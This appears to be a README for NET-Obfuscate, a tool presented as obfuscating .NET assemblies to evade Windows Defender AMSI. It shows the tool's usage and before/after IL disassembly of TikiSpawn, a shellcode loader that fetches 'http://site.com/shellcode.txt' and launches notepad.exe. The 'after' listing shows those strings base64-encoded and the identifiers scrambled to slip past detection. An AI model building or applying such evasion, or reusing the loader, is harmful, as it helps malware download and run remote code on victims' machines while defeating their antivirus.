NET-Obfuscate

Obfuscate ECMA CIL (.NET IL) assemblies to evade Windows Defender AMSI.
Accompanying blog-post: https://www.xanthus.io/post/building-an-obfuscator-to-evade-windows-defender

PS C:\Users\User\Source\Repos\NET-Obfuscate\NET-Obfuscate\bin\x64\Release> .\NET-Obfuscate.exe -h                       Usage:
  NET-Obfuscate [options]

Options:
  --in-file <in-file>      The .Net assembly path you want to obfuscate
  --out-file <out-file>    Path to the newly obfuscated file, default is "inFile".obfuscated
  --version                Show version information
  -?, -h, --help           Show help and usage information

TikiSpawn Example(IL):

Before:

.class public auto ansi beforefieldinit TikiSpawn
	extends [mscorlib]System.Object
{
	.custom instance void [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::.ctor(bool) = (
		01 00 01 00 00
	)
	// Methods
	// Token: 0x06000002 RID: 2 RVA: 0x0000204F File Offset: 0x0000024F
	.method public hidebysig specialname rtspecialname 
		instance void .ctor () cil managed 
	{
		// Header Size: 1 byte
		// Code Size: 23 (0x17) bytes
		.maxstack 8

		/* (13,5)-(13,23) C:\Users\User\Source\Repos\TikiTorch\TikiSpawn\Program.cs */
		/* 0x00000250 02           */ IL_0000: ldarg.0
		/* 0x00000251 280100000A   */ IL_0001: call      instance void [mscorlib]System.Object::.ctor()
		/* (15,9)-(15,82) C:\Users\User\Source\Repos\TikiTorch\TikiSpawn\Program.cs */
		/* 0x00000256 02           */ IL_0006: ldarg.0
		/* 0x00000257 7201000070   */ IL_0007: ldstr     "c:\\windows\\notepad.exe"
		/* 0x0000025C 722F000070   */ IL_000C: ldstr     "http://site.com/shellcode.txt"
		/* 0x00000261 2806000006   */ IL_0011: call      instance void TikiSpawn::Flame(string, string)
		/* (16,5)-(16,6) C:\Users\User\Source\Repos\TikiTorch\TikiSpawn\Program.cs */
		/* 0x00000266 2A           */ IL_0016: ret
	} // end of method TikiSpawn::.ctor

After:

.class public auto ansi beforefieldinit EVMR2Y8ZMC.JPEQYLSVTO
	extends [mscorlib]System.Object
{
	.custom instance void [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::.ctor(bool) = (
		01 00 01 00 00
	)
	// Methods
	// Token: 0x06000002 RID: 2 RVA: 0x0000204F File Offset: 0x0000024F
	.method public hidebysig specialname rtspecialname 
		instance void .ctor () cil managed 
	{
		// Header Size: 1 byte
		// Code Size: 55 (0x37) bytes
		.maxstack 8

		/* 0x00000250 02           */ IL_0000: ldarg.0
		/* 0x00000251 281000000A   */ IL_0001: call      instance void [mscorlib]System.Object::.ctor()
		/* 0x00000256 02           */ IL_0006: ldarg.0
		/* 0x00000257 00           */ IL_0007: nop
		/* 0x00000258 281100000A   */ IL_0008: call      class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
		/* 0x0000025D 7201000070   */ IL_000D: ldstr     "Yzpcd2luZG93c1xub3RlcGFkLmV4ZQ=="
		/* 0x00000262 281200000A   */ IL_0012: call      uint8[] [mscorlib]System.Convert::FromBase64String(string)
		/* 0x00000267 6F1300000A   */ IL_0017: callvirt  instance string [mscorlib]System.Text.Encoding::GetString(uint8[])
		/* 0x0000026C 00           */ IL_001C: nop
		/* 0x0000026D 281100000A   */ IL_001D: call      class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
		/* 0x00000272 7243000070   */ IL_0022: ldstr     "asRsdcDsdvsdzEsdi4xNjzuNzI5MTY2g3NoxsY2asdf9sdZsd50eHQ="
		/* 0x00000277 281200000A   */ IL_0027: call      uint8[] [mscorlib]System.Convert::FromBase64String(string)
		/* 0x0000027C 6F1300000A   */ IL_002C: callvirt  instance string [mscorlib]System.Text.Encoding::GetString(uint8[])
		/* 0x00000281 2806000006   */ IL_0031: call      instance void EVMR2Y8ZMC.JPEQYLSVTO::'40W6NX6Z4J'(string, string)
		/* 0x00000286 2A           */ IL_0036: ret
	} // end of method JPEQYLSVTO::.ctor

fnsank/NET-Obfuscate

NET-Obfuscate

TikiSpawn Example(IL):